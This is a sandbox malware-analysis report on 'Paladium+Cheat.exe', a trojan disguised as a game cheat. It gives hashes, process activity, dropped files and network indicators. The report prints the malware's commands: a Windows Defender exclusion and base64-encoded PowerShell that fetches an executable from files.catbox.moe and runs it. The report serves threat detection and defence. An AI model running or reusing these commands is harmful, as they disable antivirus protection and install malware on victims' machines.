download:

/lwpvgyhsez2gkoKUZOuoI09n1NtYMjRkY4vLpSEMNgAexG6xpj4bD_tmHKdrI0EsnWO3KebisIb0XR0sp4c2e5C7HIO0jQQFXEJd7kBxDbdsdTcWnob9IRkJol2AChrCHpJ9jtE29S3umyq4b4IVjsPbV66E-k0QyhAfUavurEYdCw/qn9bwjd07kcym02/Paladium+Cheat.exe

Full analysis: https://app.any.run/tasks/71428d21-0489-444f-a178-66fad3277737
Verdict: Malicious activity
Analysis date: June 21, 2025, 16:48:01
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-powershell
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 17 sections
MD5:

A912E723D2B25B3028A260319B747A0E

SHA1:

C94C8D56B21B132E05F08C478269889C7D6FB1B0

SHA256:

30A5D79B2C347C8BEC73C1297FF6935089FB7CA96B43EDC88F227C148B41581F

SSDEEP:

12288:WDurDnM/nnnKOxUkU8U+sjGh56Olx/afagresSv/jv+J0oAx:MurDnMyOxUkU8U+sjGh56OD/a8jv+J0F

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes Windows Defender settings

      • powershell.exe (PID: 2520)
    • Adds path to the Windows Defender exclusion list

      • powershell.exe (PID: 2520)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • Paladium+Cheat.exe (PID: 516)
      • powershell.exe (PID: 2520)
      • powershell.exe (PID: 6268)
    • BASE64 encoded PowerShell command has been detected

      • Paladium+Cheat.exe (PID: 516)
      • powershell.exe (PID: 6268)
    • Base64-obfuscated command line is found

      • Paladium+Cheat.exe (PID: 516)
      • powershell.exe (PID: 6268)
    • Application launched itself

      • powershell.exe (PID: 6268)
      • powershell.exe (PID: 2520)
    • Script adds exclusion path to Windows Defender

      • powershell.exe (PID: 2520)
    • Manipulates environment variables

      • powershell.exe (PID: 2040)
    • Execution of CURL command (POWERSHELL)

      • powershell.exe (PID: 2520)
  • INFO

    • Checks supported languages

      • Paladium+Cheat.exe (PID: 516)
    • Disables trace logs

      • powershell.exe (PID: 2520)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 2040)
    • Checks proxy server information

      • powershell.exe (PID: 2520)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2040)
      • powershell.exe (PID: 2520)
    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • powershell.exe (PID: 6268)
    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 2520)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: Executable, No line numbers, Large address aware
PEType: PE32+
LinkerVersion: 2.44
CodeSize: 110592
InitializedDataSize: 52224
UninitializedDataSize: 3584
EntryPoint: 0x131a
OSVersion: 4
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
144
Monitored processes
8
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start paladium+cheat.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe powershell.exe conhost.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
516"C:\Users\admin\Desktop\Paladium+Cheat.exe" C:\Users\admin\Desktop\Paladium+Cheat.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\paladium+cheat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2040"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:AppData C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2200C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2520"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -e YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEACgAKAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAJwAgAC0AVgBlAHIAYgAgAHIAdQBuAEEAcwAKAAoAYwB1AHIAbAAgAC0AbwAgAEEAdQBkAGkAbwBTAHkAUwBEAHIAaQB2AGUAcgAuAGUAeABlACAAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAGMAYQB0AGIAbwB4AC4AbQBvAGUALwBhAGIAcABqADEAawAuAHAAbgBnAAoACgBzAHQAYQByAHQAIAAiACQAZQBuAHYAOgBBAHAAcABEAGEAdABhAFwAQQB1AGQAaQBvAFMAeQBTAEQAcgBpAHYAZQByAC4AZQB4AGUAIgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
3092\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5884\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exePaladium+Cheat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6268powershell -e cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQAgAFkAdwBCAGsAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEUARQBBAGMAQQBCAHcAQQBFAFEAQQBZAFEAQgAwAEEARwBFAEEAQwBnAEEASwBBAEgATQBBAGQAQQBCAGgAQQBIAEkAQQBkAEEAQQBnAEEASABBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAHoAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEEAdABBAEUARQBBAGMAZwBCAG4AQQBIAFUAQQBiAFEAQgBsAEEARwA0AEEAZABBAEIATQBBAEcAawBBAGMAdwBCADAAQQBDAEEAQQBKAHcAQgBCAEEARwBRAEEAWgBBAEEAdABBAEUAMABBAGMAQQBCAFEAQQBIAEkAQQBaAFEAQgBtAEEARwBVAEEAYwBnAEIAbABBAEcANABBAFkAdwBCAGwAQQBDAEEAQQBMAFEAQgBGAEEASABnAEEAWQB3AEIAcwBBAEgAVQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARQBFAEEAYwBBAEIAdwBBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBKAHcAQQBnAEEAQwAwAEEAVgBnAEIAbABBAEgASQBBAFkAZwBBAGcAQQBIAEkAQQBkAFEAQgB1AEEARQBFAEEAYwB3AEEASwBBAEEAbwBBAFkAdwBCADEAQQBIAEkAQQBiAEEAQQBnAEEAQwAwAEEAYgB3AEEAZwBBAEUARQBBAGQAUQBCAGsAQQBHAGsAQQBiAHcAQgBUAEEASABrAEEAVQB3AEIARQBBAEgASQBBAGEAUQBCADIAQQBHAFUAQQBjAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAQQBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBjAHcAQQB1AEEARwBNAEEAWQBRAEIAMABBAEcASQBBAGIAdwBCADQAQQBDADQAQQBiAFEAQgB2AEEARwBVAEEATAB3AEIAaABBAEcASQBBAGMAQQBCAHEAQQBEAEUAQQBhAHcAQQB1AEEASABBAEEAYgBnAEIAbgBBAEEAbwBBAEMAZwBCAHoAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEASQBBAEEAaQBBAEMAUQBBAFoAUQBCAHUAQQBIAFkAQQBPAGcAQgBCAEEASABBAEEAYwBBAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBRAFEAQgAxAEEARwBRAEEAYQBRAEIAdgBBAEYATQBBAGUAUQBCAFQAQQBFAFEAQQBjAGcAQgBwAEEASABZAEEAWgBRAEIAeQBBAEMANABBAFoAUQBCADQAQQBHAFUAQQBJAGcAQQA9AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePaladium+Cheat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
6684\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 910
Read events
14 910
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
2520powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1mtpxkiy.afz.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2520powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l3ygoz5e.j25.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6268powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zkzsn1gy.zmp.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6268powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zhvt1gmr.k0i.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ytcimhvh.sfn.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ijwwr2rs.yz0.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5M1LD9D9MDOMAY5QOP8N.tempbinary
MD5:BD4CA260102200EFB145FCBF90FEDFCB
SHA256:442C5CAE3A65E822812ADEB51DCC597975D03027020F9C00F6F307FB2795B6D7
2040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:BD4CA260102200EFB145FCBF90FEDFCB
SHA256:442C5CAE3A65E822812ADEB51DCC597975D03027020F9C00F6F307FB2795B6D7
2040powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:21B0D976B0F57C9849043619D73B97BB
SHA256:99591B8997AEEB31F137DD50FF85E1914670D962E3971AC23FEFB3A8C78BB351
2040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF176b1e.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
24
DNS requests
13
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1688
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1268
svchost.exe
GET
200
23.55.104.190:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4960
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4960
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5944
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4380
RUXIMICS.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2520
powershell.exe
108.181.20.35:443
files.catbox.moe
TELUS Communications
CA
malicious
2336
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
1688
svchost.exe
40.126.32.134:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1688
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
1268
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.184.238
whitelisted
files.catbox.moe
  • 108.181.20.35
malicious
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 40.126.32.134
  • 40.126.32.140
  • 40.126.32.74
  • 40.126.32.136
  • 40.126.32.138
  • 20.190.160.4
  • 20.190.160.132
  • 20.190.160.3
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.43
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.55.104.190
  • 23.55.104.172
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted

Threats

No threats detected
No debug info